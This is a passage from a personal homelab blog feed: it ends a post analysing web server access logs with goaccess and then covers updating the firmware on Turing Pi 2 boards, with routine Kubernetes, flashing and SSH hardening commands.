      </tr>
  </thead>
  <tbody>
      <tr>
          <td style="text-align: right">7746</td>
          <td style="text-align: right">0.40%</td>
          <td style="text-align: right">30492</td>
          <td style="text-align: right">257 MiB</td>
          <td style="text-align: right">2025-11-22</td>
      </tr>
      <tr>
          <td style="text-align: right">7483</td>
          <td style="text-align: right">0.38%</td>
          <td style="text-align: right">26523</td>
          <td style="text-align: right">388 MiB</td>
          <td style="text-align: right">2025-11-27</td>
      </tr>
      <tr>
          <td style="text-align: right">7162</td>
          <td style="text-align: right">0.37%</td>
          <td style="text-align: right">27083</td>
          <td style="text-align: right">240 MiB</td>
          <td style="text-align: right">2025-11-21</td>
      </tr>
      <tr>
          <td style="text-align: right">7126</td>
          <td style="text-align: right">0.37%</td>
          <td style="text-align: right">26839</td>
          <td style="text-align: right">283 MiB</td>
          <td style="text-align: right">2025-11-26</td>
      </tr>
      <tr>
          <td style="text-align: right">7081</td>
          <td style="text-align: right">0.36%</td>
          <td style="text-align: right">46890</td>
          <td style="text-align: right">442 MiB</td>
          <td style="text-align: right">2025-10-05</td>
      </tr>
      <tr>
          <td style="text-align: right">6550</td>
          <td style="text-align: right">0.34%</td>
          <td style="text-align: right">26169</td>
          <td style="text-align: right">356 MiB</td>
          <td style="text-align: right">2025-11-20</td>
      </tr>
      <tr>
          <td style="text-align: right">5649</td>
          <td style="text-align: right">0.29%</td>
          <td style="text-align: right">42871</td>
          <td style="text-align: right">616 MiB</td>
          <td style="text-align: right">2025-12-02</td>
      </tr>
  </tbody>
</table>
<p>So there are a lot more hits than visitors, which makes sense: the data does
contain both my blog and my Mastodon instance. And the Mastodon instance likely
has relatively few visitors, but a lot of requests. Overall, there also doesn&rsquo;t
seem to be that much variation, at least not at the top. What is interesting
in this table is the variation in the amount of transmitted data. I would
have expected that to be relatively stable day-to-day, with perhaps a bit more
traffic on days where I post a few screenshots of Grafana graphs, or a particularly
chart-heavy blog post. I tried to figure out what I might have done on 2025-12-02,
but I neither posted a picture on Mastodon nor a blog post.</p>
<p>Sorting that section by the TX data, 2025-05-01 is at the top, with over 30 GiB
transferred. I grepped for &ldquo;2025-05-01&rdquo; in the log and then piped the result
into goaccess again, and that was the day I switched my k8s control plane nodes
to Pi 5, and posted a few pictures on Mastodon. Specifically, <a href="https://social.mei-home.net/@mmeier/114431345389666115">this thread</a>.</p>
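<p>That per-day drill-down is just the same goaccess invocation fed with a pre-filtered
subset; roughly like this, with the format options from above abbreviated:</p>
<pre tabindex="0"><code>grep -a &#39;2025-05-01&#39; cleaned.log | goaccess --log-format=&#39;...&#39; --date-format=&#39;%Y-%m-%d&#39; --time-format=&#39;%T%z&#39; -
</code></pre>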
<p>Next up, requested files/URLs, sorted by number of hits:</p>
<table>
  <thead>
      <tr>
          <th style="text-align: right">Hits</th>
          <th style="text-align: right">Percentage of Total Hits</th>
          <th style="text-align: right">Transmitted Data</th>
          <th>URL</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td style="text-align: right">8963559</td>
          <td style="text-align: right">44.13%</td>
          <td style="text-align: right">2 MiB</td>
          <td><code>/inbox</code></td>
      </tr>
      <tr>
          <td style="text-align: right">462035</td>
          <td style="text-align: right">2.27%</td>
          <td style="text-align: right">901 MiB</td>
          <td><code>/user/mmeier</code></td>
      </tr>
      <tr>
          <td style="text-align: right">443268</td>
          <td style="text-align: right">2.18%</td>
          <td style="text-align: right">250 MiB</td>
          <td><code>/.well-known/webfinger?resource=acct:mmeier@social.mei-home.net</code></td>
      </tr>
      <tr>
          <td style="text-align: right">397849</td>
          <td style="text-align: right">1.96%</td>
          <td style="text-align: right">2670 MiB</td>
          <td><code>/</code></td>
      </tr>
      <tr>
          <td style="text-align: right">358815</td>
          <td style="text-align: right">1.77%</td>
          <td style="text-align: right">60 MiB</td>
          <td><code>/users/mmeier/collections/featured</code></td>
      </tr>
      <tr>
          <td style="text-align: right">343021</td>
          <td style="text-align: right">1.57%</td>
          <td style="text-align: right">789 MiB</td>
          <td><code>/index.xml</code></td>
      </tr>
      <tr>
          <td style="text-align: right">319137</td>
          <td style="text-align: right">1.57%</td>
          <td style="text-align: right">64 MiB</td>
          <td><code>/users/mmeier/following</code></td>
      </tr>
  </tbody>
</table>
<p>Those are obviously dominated by my Mastodon instance, with <code>POST</code> requests to
the inbox accounting for almost half of all requests which reached my Homelab
from external sources. The only non-Mastodon URLs are <code>/index.xml</code>, which is
from my blog, and possibly <code>/</code>, which might be hitting either Mastodon or the blog.
I&rsquo;m also assuming that <code>/index.xml</code> will make up a larger share in the future,
as I switched to providing full text in my RSS feed a little while ago.</p>
<p>Next is a specific section for 404&rsquo;s, but that&rsquo;s not too interesting, because it&rsquo;s
just a lot of Mastodon API data endpoints, and I disabled those.</p>
<p>Then come the visitors&rsquo; IPs. I won&rsquo;t post the entire table, as I don&rsquo;t think it&rsquo;s
too useful, but there was something worth mentioning: over the entire
timeframe, a whole 8.83% of requests came from one IP, <code>38.242.251.94</code>. I first
thought that was a crawler of some sort, but it turns out to be a Fediverse
instance. Specifically, the PeerTube instance <a href="https://tilvids.com">tilvids.com</a>.
Filtering only for that IP, 99% of requests are for <code>/inbox</code>. I got curious and
started asking around whether PeerTube instances are particularly talkative,
because I&rsquo;m following only a few channels on that instance, which don&rsquo;t post
that much. But it&rsquo;s still showing up a lot more than e.g. mastodon.social, where
I&rsquo;m following a lot more people.
Sadly, at the time of writing, there were no responses. I can only assume that
PeerTube sends out a lot more requests, even if nobody on the receiving instance
is actually interested in them.</p>
<p>Next are the operating systems and browsers. I&rsquo;m genuinely unsure how interesting
these are, considering that some bots like to lie, and goaccess doesn&rsquo;t do any
deep analysis; it just looks at the access log line&rsquo;s User Agent string.</p>
<table>
  <thead>
      <tr>
          <th style="text-align: right">Hits</th>
          <th style="text-align: right">Percentage of Total Hits</th>
          <th>Operating System</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td style="text-align: right">14734214</td>
          <td style="text-align: right">72%</td>
          <td>Crawlers</td>
      </tr>
      <tr>
          <td style="text-align: right">2602332</td>
          <td style="text-align: right">12%</td>
          <td>Unknown</td>
      </tr>
      <tr>
          <td style="text-align: right">848514</td>
          <td style="text-align: right">5%</td>
          <td>Windows</td>
      </tr>
      <tr>
          <td style="text-align: right">720961</td>
          <td style="text-align: right">3%</td>
          <td>Android</td>
      </tr>
      <tr>
          <td style="text-align: right">211467</td>
          <td style="text-align: right">1%</td>
          <td>Linux</td>
      </tr>
      <tr>
          <td style="text-align: right">163847</td>
          <td style="text-align: right">0.81%</td>
          <td>macOS</td>
      </tr>
      <tr>
          <td style="text-align: right">26675</td>
          <td style="text-align: right">0.45%</td>
          <td>iOS</td>
      </tr>
  </tbody>
</table>
<p>So it&rsquo;s clear that my Homelab mostly exists for the benefit of crawlers. &#x1f609;
What I did find a bit surprising was that Linux is so far down, considering that
the majority of actual people arriving at my proxy have to be coming for the blog.
While the Crawlers category will also contain things like Fediverse servers, my blog is
the only other interesting, externally accessible service. And considering that
it&rsquo;s mostly really nerdy Homelab content, I would have expected the
percentage of Linux users to be higher. It is of course possible that bots
masquerading as normal users tend to claim Windows rather than Linux.</p>
<p>The last interesting stat overall is the actual domains getting hit:</p>
<table>
  <thead>
      <tr>
          <th style="text-align: right">Hits</th>
          <th style="text-align: right">Percentage of Total Hits</th>
          <th>Domain</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td style="text-align: right">16862714</td>
          <td style="text-align: right">73%</td>
          <td>social.mei-home.net</td>
      </tr>
      <tr>
          <td style="text-align: right">1690065</td>
          <td style="text-align: right">34%</td>
          <td>blog.mei-home.net</td>
      </tr>
      <tr>
          <td style="text-align: right">633110</td>
          <td style="text-align: right">3%</td>
          <td>bookwyrm.mei-home.net</td>
      </tr>
      <tr>
          <td style="text-align: right">453558</td>
          <td style="text-align: right">2%</td>
          <td>cloud.mei-home.net</td>
      </tr>
      <tr>
          <td style="text-align: right">425668</td>
          <td style="text-align: right">2%</td>
          <td>s3-mastodon.mei-home.net</td>
      </tr>
      <tr>
          <td style="text-align: right">42625</td>
          <td style="text-align: right">0.2%</td>
          <td>mei-home.net</td>
      </tr>
      <tr>
          <td style="text-align: right">41970</td>
          <td style="text-align: right">0.2%</td>
          <td>s3-bookwyrm.mei-home.net</td>
      </tr>
  </tbody>
</table>
<p>Nothing really surprising here. Most of the traffic comes from my Mastodon
instance. What is a bit surprising is that the blog is still responsible for 34%
of the requests. I don&rsquo;t think I&rsquo;ve got that many readers, especially compared to
the amount of traffic my Mastodon instance produces. Perhaps it&rsquo;s all the RSS
feed readers everyone self-hosts?</p>
<p>So much for a short introduction to goaccess and a look at the last three years
of data from my Homelab&rsquo;s ingress. This taught me two things:</p>
<ol>
<li>I really want to get a move on and introduce some sort of metrics gathering
for my blog</li>
<li>I really should introduce log rotation for the Traefik logs on my bastion host
(a rough sketch of what that could look like follows below) &#x1f605;</li>
</ol>
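<p>For the second point, a small logrotate drop-in would probably already go a long
way. The following is just a sketch with assumed paths; using <code>copytruncate</code>
avoids having to tell Traefik to reopen its log file after rotation, at the cost
of possibly losing a few lines during the switch:</p>
<pre tabindex="0"><code>cat &lt;&lt;&#39;EOF&#39; | sudo tee /etc/logrotate.d/traefik
/var/log/traefik/access.log {
    weekly
    rotate 12
    compress
    missingok
    notifempty
    copytruncate
}
EOF
</code></pre>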
]]></content:encoded>
    </item>
    <item>
      <title>Updating the Firmware on my Turing Pi 2 Boards</title>
      <link>https://blog.mei-home.net/posts/tp2-fw-update/</link>
      <pubDate>Thu, 18 Dec 2025 21:50:36 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/tp2-fw-update/</guid>
      <description>I had to touch hardware</description>
      <content:encoded><![CDATA[<p>Wherein I update my Turing Pi 2 boards to a new firmware.</p>
<p>During the migration of my Homelab to a fleet of Raspberry Pi 4, I bought two
<a href="https://turingpi.com/product/turing-pi-2-5/">Turing Pi 2 boards</a> and put eight
Raspberry Pi CM4 8GB into them. You can read more about my setup <a href="https://blog.mei-home.net/posts/turing-pi-2/">here</a>.</p>
<p>The board has a nice Baseboard Management Controller (BMC). It is an Allwinner SoC
with 128 MB of RAM and 128 MB of flash for the OS. It&rsquo;s running an embedded Linux
distribution. This BMC implements a few interesting features:</p>
<ul>
<li>Turning power on/off for each individual node</li>
<li>Connecting to the serial console of each of the nodes</li>
<li>Flashing each of the nodes if it has internal storage, like Pi CM4 with eMMC</li>
</ul>
<p>There is also an internal Ethernet switch chip, which connects the four nodes
and provides two 1GbE ports for external connectivity. Sadly, that chip is not
really controllable yet, even with the newest firmware. So it&rsquo;s still only
usable as a dumb switch.</p>
<p>As originally delivered, the firmware was perfectly workable; I&rsquo;ve been running
my boards with it for two years. But it was also a bit problematic, as it provided
a web UI without any authentication at all, through which nodes could be flashed
and powered on and off.</p>
<p>The v2 firmware I&rsquo;m installing in this blog post has proper authentication, and
adds support for a CLI tool which can be used to control the board remotely, in
addition to the web UI.</p>
<p>The new version also adds support for the Turing Pi <a href="https://turingpi.com/product/turing-rk1/">RK1</a>.
That&rsquo;s an SBC based on the RK3588 SoC, developed by the same people who designed
the Turing Pi 2 board. And I&rsquo;ve got one of those lying around. But more on that
later.</p>
<h2 id="firmware-update">Firmware update</h2>
<p>I was still on the original v1 firmware and needed to update to the most recent
<a href="https://github.com/turing-machines/BMC-Firmware/releases/tag/v2.1.0">v2.1</a>. One
note: For some reason, their docs point to <a href="https://firmware.turingpi.com/turing-pi2/">this part of their website</a>
for downloads, but the newer firmware versions are only available in their
<a href="https://github.com/turing-machines/BMC-Firmware">GitHub repo</a>.</p>
<p>For the update, I followed <a href="https://docs.turingpi.com/docs/turing-pi2-bmc-v1x-to-v2x">these docs</a>.
While the new version of the firmware supports flashing via the web UI, this
update from v1 to v2 needs to be done via the SD card.</p>
<p>But before I could get started, I had to solve the Homelab uptime problem. As I&rsquo;m
running a very serious operation here, I could of course not tolerate any downtime
for any services. But at the same time, this update couldn&rsquo;t be done online, so
I would have to take down four of my CM4. Meaning 16 cores and 32 GB of RAM would
be temporarily unavailable. And while my Homelab is intentionally designed with
some slack, I didn&rsquo;t have quite that much slack left. So I went to my Ceph
hosts, specifically the largest, which has 32 GB of RAM that it definitely does
not need at the moment. Here is what my three Ceph hosts look like under normal
operation:</p>
<pre tabindex="0"><code>ceph1:
Allocated resources:
  (Total limits may be over 100 percent, i.e., overcommitted.)
  Resource           Requests       Limits
  --------           --------       ------
  cpu                3 (75%)        0 (0%)
  memory             11412Mi (72%)  14624Mi (92%)
ceph2:
Allocated resources:
  (Total limits may be over 100 percent, i.e., overcommitted.)
  Resource           Requests       Limits
  --------           --------       ------
  cpu                3400m (85%)    0 (0%)
  memory             11824Mi (77%)  15648Mi (102%)
ceph3:
Allocated resources:
  (Total limits may be over 100 percent, i.e., overcommitted.)
  Resource           Requests       Limits
  --------           --------       ------
  cpu                3150m (39%)    0 (0%)
  memory             10276Mi (32%)  14012Mi (44%)
</code></pre><p>So at least going by the limits, two of them were almost full already. But ceph3
still had enough unused resources to hold a few Pods during the downtime.</p>
<p>So I removed the NoSchedule taint from it like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl taint nodes ceph3 homelab/taint.role<span style="color:#f92672">=</span>ceph:NoSchedule-
</span></span></code></pre></div><p>With that, it would be allowed to run non-Ceph Pods.</p>
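<p>A quick way to confirm that the taint is really gone, and later to see which Pods
ended up on the node:</p>
<pre tabindex="0"><code>kubectl describe node ceph3 | grep Taints
kubectl get pods -A -o wide --field-selector spec.nodeName=ceph3
</code></pre>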
<p>I then drained the four CM4 on the first board:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl drain --delete-emptydir-data --force --ignore-daemonsets worker1 worker2 worker3 worker4
</span></span></code></pre></div><p>And finally shut them all down:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ansible <span style="color:#e6db74">&#34;worker1:worker2:worker3:worker4&#34;</span> -a <span style="color:#e6db74">&#34;systemctl poweroff&#34;</span>
</span></span></code></pre></div><p>I will describe the effects and show some metrics about the shutdown&rsquo;s impact on
my cluster later in this post.</p>
<p>To prepare the update, I needed to put the firmware on an SD card. Here are
the commands to do that:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>wget https://github.com/turing-machines/BMC-Firmware/releases/download/v2.1.0/tp2-firmware-sdcard-v2.1.0.img
</span></span><span style="display:flex;"><span>dd <span style="color:#66d9ef">if</span><span style="color:#f92672">=</span>tp2-firmware-sdcard-v2.1.0.img of<span style="color:#f92672">=</span>/non-existant-path bs<span style="color:#f92672">=</span>1M status<span style="color:#f92672">=</span>progress
</span></span></code></pre></div><p>The <code>of</code> parameter should then point to the SD card. Point it to the device, e.g.
<code>/dev/sde</code>, not <code>/dev/sde1</code>.</p>
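<p>To figure out which device the SD card actually is, and to make sure everything is
flushed to it before pulling the card, something like this helps:</p>
<pre tabindex="0"><code># List block devices with size and transport type to spot the SD card
lsblk -o NAME,SIZE,MODEL,TRAN
# After dd has finished, flush all buffers before removing the card
sync
</code></pre>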
<p>With that done, I opened the board&rsquo;s schematics to hunt for the SD card slot:
<figure>
    <img loading="lazy" src="tp2-top.png"
         alt="A schematic of the top side of the Turing Pi 2 board. The important part is that there&#39;s no SD card slot anywhere on it. What follows is a more detailed description, but I only provide it for completeness&#39; sake, it is not relevant for the rest of the post and you can safely skip it. In the center of the board are the four slots for the compute modules. Each of them has a fan header next to it. They&#39;re connected to different peripherals on the board. The top slot is connected an mPCIe slot. The second node is connected to another mPCIe slot. Node 3 has connections to two SATA3 ports. Node 4 is connected to two USB 3.0 ports. In addition, there is a GPIO 40-pin connector and a slot for a CR2032 battery. Power is supplied via a standard 24-pin ATX connector in the bottom left corner. Along the lower right edge are several external ports, from top to bottom: 1x CM4 USB connector. 1x HDMI display connector. 2x 1GbE RJ45 jacks. 2x USB 3.0 connectors. On the upper edge are some internal connectors for UART to the nodes and the BMC. Along the left edge are some more internal connectors, namely 2x SATA 3 ports, 2x internal USB 3.0 ports, the front panel IO header and a DSI header."/> <figcaption>
            <p>No SD card slot on the top of the boards. From <a href="https://docs.turingpi.com/docs/turing-pi2-specs-and-io-ports">https://docs.turingpi.com/docs/turing-pi2-specs-and-io-ports</a></p>
        </figcaption>
</figure>

Sadly, the SD card slot is not on the top, but instead it&rsquo;s on the bottom:
<figure>
    <img loading="lazy" src="tp2-bottom.png"
         alt="A schematic of the bottom side of the Turing Pi 2 board. There&#39;s a lot less to see here. Along the left side are for M.2 NVMe slots for storage. And to the right of them, quite a bit away from the edge of the board, is a lone SD card slot."/> <figcaption>
            <p>There is the SD card slot. From <a href="https://docs.turingpi.com/docs/turing-pi2-specs-and-io-ports">https://docs.turingpi.com/docs/turing-pi2-specs-and-io-ports</a></p>
        </figcaption>
</figure>
</p>
<p>The slot is entirely inaccessible while the board is mounted in a case.</p>
<p>So I had to do the one thing about Homelabbing I actually don&rsquo;t enjoy that much:
Touching hardware. I&rsquo;m still thinking that at some point, I should spec out
something roughly equivalent to my Homelab at a large cloud provider and see how expensive it really is.</p>
<p>Here is the board still in the case:
<figure>
    <img loading="lazy" src="tp2-in-case.jpg"
         alt="A picture of the TP2 board sitting in a 3U rack case. It has four Raspberry Pi CM4 modules in it. It&#39;s connected with a 24-pin ATX connector to a normal ATX power supply. Also connected is part of the front panel header and the internal USB connector. In addition, there&#39;s a Noctua fan controller sitting there, connected to two 120mm Noctua fans and powered by one of the SATA rails from the power supply. It is all extremely dusty. As in: You couldn&#39;t just write your name in it. You could write the entirety of The Prince in it, with multiple layers."/> <figcaption>
            <p>One of the boards in its 3U rack case. Dust left in for realism.</p>
        </figcaption>
</figure>

Dusted after taking the picture, so you all know it&rsquo;s real. &#x1f605;</p>
<p>I was a bit apprehensive about taking the case out of the rack, to be honest. This
particular case was mounted before I figured out how rack rails work. And I was
pretty brutal with the ones for this case. I didn&rsquo;t see any problem with taking
it out. But I was a bit worried whether I would be able to put it back in again.
Luckily, it all worked out in the end.</p>
<p>With the board removed from the case, I was finally able to access the SD card
slot:
<figure>
    <img loading="lazy" src="tp2-backside.jpg"
         alt="A picture of the backside of the board. It shows exactly what the schematics above showed: Four M.2 slots for NVMe SSDs and a single lone SD card slot, definitely too far away from the edge of the board to be accessible while the board is mounted in a case."/> <figcaption>
            <p>There&rsquo;s the SD card slot.</p>
        </figcaption>
</figure>
</p>
<p>I&rsquo;ve finally found the place to put the SD card. This was already a lot more work
than I had initially thought. But from hereon out, everything went quite smoothly.
I connected the board&rsquo;s UART to my trusty USB-to-Serial adapter and launched minicom:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>minicom -b <span style="color:#ae81ff">115200</span> -D /dev/ttyUSB0
</span></span></code></pre></div><p>After starting the board, I was greeted with this text on said console:</p>
<pre tabindex="0"><code> _____ _   _ ____  ___ _   _  ____
|_   _| | | |  _ \|_ _| \ | |/ ___|
  | | | | | | |_) || ||  \| | |  _
  | | | |_| |  _ &lt; | || |\  | |_| |
  |_|  \___/|_| \_\___|_| \_|\____|

This utility will perform a fresh installation of the Turing Pi 2 BMC firmware.

Note that this will ERASE ALL USER DATA stored on the Turing Pi 2 BMC, thus
restoring back to factory defaults. Do NOT proceed unless you have first backed
up any files that you care about!

If you wish to confirm the operation and proceed, either:
1) Type &#39;CONFIRM&#39; at the below prompt
2) Press one of the front panel buttons (POWER or RESET), or the KEY1 button on
   the Turing Pi 2 board itself, three times in a row

If you are here in error, please remove the microSD card from the Turing Pi 2
board and reset the BMC.

Type &#34;CONFIRM&#34; to continue:
</code></pre><p>I typed <code>CONFIRM</code> here as instructed, but the flashing could also be started by
pressing a button on the board itself 3x in quick succession. So a serial connection
is not strictly necessary.
The flashing went pretty quickly, in under a minute, with relatively little
output:</p>
<pre tabindex="0"><code>INFO: Legacy Allwinner boot code has been found and erased
INFO: Legacy Allwinner boot code has been found and erased
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: AWNAND SIMULATE_MULTIPLANE layout detected, performing migration
INFO: Legacy Allwinner boot code has been found and erased
INFO: Legacy Allwinner boot code has been found and erased
[+] DONE: Please remove the microSD card and reset the BMC.
</code></pre><p>As instructed, I removed the SD card and rebooted the board. I was immediately
greeted by some Linux boot output and then a login prompt. Everything had worked
nicely.</p>
<p>I needed to do a few little adaptations to the configuration though. First, the
MAC had changed, so I needed to update it in my DHCP static leases. At least the
MAC is now static by default, instead of being generated anew every time the board
boots, as with the previous firmware.
Then I set the hostname in <code>/etc/hosts</code> and <code>/etc/hostname</code> and updated the root
password. Finally, I created a non-root user (the same steps are consolidated into
a sketch right after this list):
<ul>
<li><code>mkdir -p /home/myuser</code></li>
<li><code>adduser -s /bin/bash -D myuser</code></li>
<li>Then I went into <code>/etc/shadow</code> and replaced the <code>!</code> with a <code>*</code> in the password
field. No idea why I had run with the <code>-D</code> option initially.</li>
</ul>
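<p>For future reference, the user setup as one small sketch; the username is a
placeholder, and the <code>sed</code> line just automates the <code>/etc/shadow</code> edit described
above:</p>
<pre tabindex="0"><code>mkdir -p /home/myuser
adduser -s /bin/bash -D myuser
# Unlock the account for key-based logins without setting a password,
# i.e. replace the &#39;!&#39; in the password field with a &#39;*&#39;
sed -i &#39;s/^myuser:!:/myuser:*:/&#39; /etc/shadow
</code></pre>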
<p>Then I could switch to the user and add a few SSH keys. Finally, I also had
to change the SSHD configuration, because by default it allows password logins
and root logins. I added/changed the following options:</p>
<ul>
<li><code>PubkeyAuthentication yes</code></li>
<li><code>PermitRootLogin no</code></li>
<li><code>PasswordAuthentication no</code></li>
<li><code>AllowUsers myuser</code></li>
</ul>
<p>The restart of SSHD was a bit tricky. There&rsquo;s a script they tell you to use:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>/etc/init.d/S50sshd restart
</span></span></code></pre></div><p>The problem is that that&rsquo;s a shell script which first stops SSHD and then starts
it again. As you might imagine, that doesn&rsquo;t go too well when executed via SSH.
While the stop action is still run, the terminal is disconnected after that,
because SSH is gone. So the start command is never run.</p>
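<p>One way around this, which I haven&rsquo;t tested extensively, would be to detach the
restart from the SSH session, so the start half of the script still runs after the
connection drops; alternatively, the restart can simply be done from the serial console:</p>
<pre tabindex="0"><code>nohup /etc/init.d/S50sshd restart &gt;/dev/null 2&gt;&amp;1 &amp;
</code></pre>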
<p>But that&rsquo;s it already. After those steps I was able to put the board back into
the case and start with the next one.</p>
<p>With that done too, the only thing left was to add back the taint to my Ceph
node so it&rsquo;s no longer used for non-Ceph stuff:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl taint nodes ceph3 homelab/taint.role<span style="color:#f92672">=</span>ceph:NoSchedule
</span></span></code></pre></div><p>Same command as removing the taint, just without the <code>-</code> at the end.</p>
<h2 id="results">Results</h2>
<p>Well, first of all: Most things still worked. Emphasis on <em>most</em>. The one thing
which no longer seems to work is connecting to the nodes&rsquo; serial consoles. It
just outputs garbage. And it seems that&rsquo;s because the new <a href="https://github.com/turing-machines/bmcd">bmcd</a>
opens the serial console devices as well. So you can&rsquo;t open them anymore when
SSH&rsquo;d into the board. Which really isn&rsquo;t ideal.</p>
<p>But onto the good things. First, there&rsquo;s been a rework of the UI. Here&rsquo;s an
example of the old UI:
<figure>
    <img loading="lazy" src="old-ui.png"
         alt="A screenshot of the old Turing Pi 2 web UI&#39;s power tab. It shows four selector switches for turning power on and off for each node and a Submit button at the bottom."/> <figcaption>
            <p>The old Turing Pi 2 v1 web UI</p>
        </figcaption>
</figure>

And here&rsquo;s the equivalent page on the new UI:
<figure>
    <img loading="lazy" src="new-ui.png"
         alt="Another screenshot of a similar page. the theme is now dark. Each node has two additional fields the user can set, one for the node name and one for the node module type. In addition to the previously present power toggle, there&#39;s now also a restart button. Also in contrast to the previous version, the UI is now labeled in German."/> <figcaption>
            <p>The new Turing Pi 2 web UI</p>
        </figcaption>
</figure>

I like the new style and the fact that there&rsquo;s now a dark theme. Plus, the restart
buttons are nice. Previously, when I needed to do a hard reset of one of the nodes,
I had to first switch it off and then switch it back on again. In the future, that
will be one click.
In addition, this UI now has proper authentication, where the previous version
had exactly none. It uses the accounts of the BMC system; there&rsquo;s no separate
user management for the web UI.</p>
<p>In addition to this update of the UI, there&rsquo;s now an HTTP API and a CLI tool
for using it, the <a href="https://github.com/turing-machines/tpi">tpi tool</a>. It can do
all of the things the web UI can, and then some. For example, this command will
show the serial console output of node 2:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>tpi uart --host my.turingpi --user root --node <span style="color:#ae81ff">2</span> get
</span></span></code></pre></div><p>This functionality is the reason that the serial consoles are useless when you&rsquo;re
actually logged into the BMC, see <a href="https://github.com/turing-machines/BMC-Firmware/issues/200">this issue</a>.</p>
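<p>The other subcommands follow the same pattern. Turning on node 2 remotely should
look roughly like this, assuming the <code>power</code> subcommand takes the same connection
flags as the <code>uart</code> example above (a sketch, the exact syntax may differ slightly):</p>
<pre tabindex="0"><code>tpi power --host my.turingpi --user root --node 2 on
</code></pre>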
<p>Finally: The new firmware has support for flashing and using the <a href="https://turingpi.com/product/turing-rk1/">Turing RK1</a>.
An RK3588-based SBC that can be plugged into the Turing Pi 2 boards. I should be
excited about it. I bought one of them a while ago, with 32 GB of RAM. It would
be really cool to use these as an upgrade path for my Homelab. The RK3588 is a
good chip and makes a nice Homelab host with 8 cores.
But broad Linux support for the chip is essentially nonexistent. There is an Ubuntu
that&rsquo;s supposed to work, <a href="https://github.com/Joshua-Riek/ubuntu-rockchip">ubuntu-rockchip</a>.
But the maintainer stepped back from it about a year ago. So what am I supposed to
do? Run a chip with an outdated kernel, running services accessible from the
Internet? I don&rsquo;t think so.</p>
<p>So very likely, I will keep it as a high-tech paperweight.
What do you mean I sound miffed with my past self for dropping money on a piece
of hardware with shaky software support? Naaah, not at all. &#x1f612;</p>
<h2 id="how-the-homelab-reacted">How the Homelab reacted</h2>
<p>Before ending this post, I&rsquo;d like to do a quick section about what the Homelab
looked like during the periods where I took one of the Turing Pi boards out of
the cluster. Those Pi CM4 8GB modules in the two Turing Pi 2 boards are my main
worker nodes. I&rsquo;ve also got one more node, an older x86 SBC I keep around for
apps which don&rsquo;t support aarch64. So by taking out one of the boards, I lose
16 cores and 32 GB of RAM. And my Homelab didn&rsquo;t really bat an eye at that. I&rsquo;ve
already got a bit of slack in the resources. The idea being that I can take out
a few nodes for maintenance, e.g. reboots during the regular host updates, without
having to take down the entire Homelab.</p>
<p>So there wasn&rsquo;t much of a change in the k8s cluster and my apps. Temporarily
allowing Pods onto my largest Ceph node took care of that. But there was a
reduction in the overall power consumption of the Homelab.</p>
<figure>
    <img loading="lazy" src="power.png"
         alt="A screenshot of a Grafana time series chart with one plot. It shows the power consumption of my Homelab over the time period from 2025-12-12 to 2025-12-18. The plot shows an average power consumption between 155 and 165 W. Some high spikes go up to over 200 W, but those are only very short spikes. The only exception is the period between the 21:00 on the 15th and 17:30 on the 16th. In that period, the power consumption goes down to about 140 - 150 W, before going aback to the previous values."/> <figcaption>
            <p>Power consumption of my entire Homelab</p>
        </figcaption>
</figure>

<p>This plot shows that one full board with 16 cores and 32 GB worth of Pi 4 consumes
somewhere around 20 - 25 W under normal conditions. But there was one effect I will
have to think about a bit more:</p>
<figure>
    <img loading="lazy" src="power-zoomed.png"
         alt="A screenshot of the same chart, but now zoomed into the time when I first disconnected the board from power entirely, pulling the power plug. It goes from 19:10 to 23:00. At the beginning, the consumption hovers around 155 to 160 W. Then, at 21:04, it drops a bit to 146 W. Another drop happens around 21:16, down to 136 W. After that drop, the power consumption mostly stays around that value."/> <figcaption>
            <p>Power consumption of my Homelab, zoomed in.</p>
        </figcaption>
</figure>

<p>In the plot, I switched off the four Pi CM4 on the board around 21:04, resulting
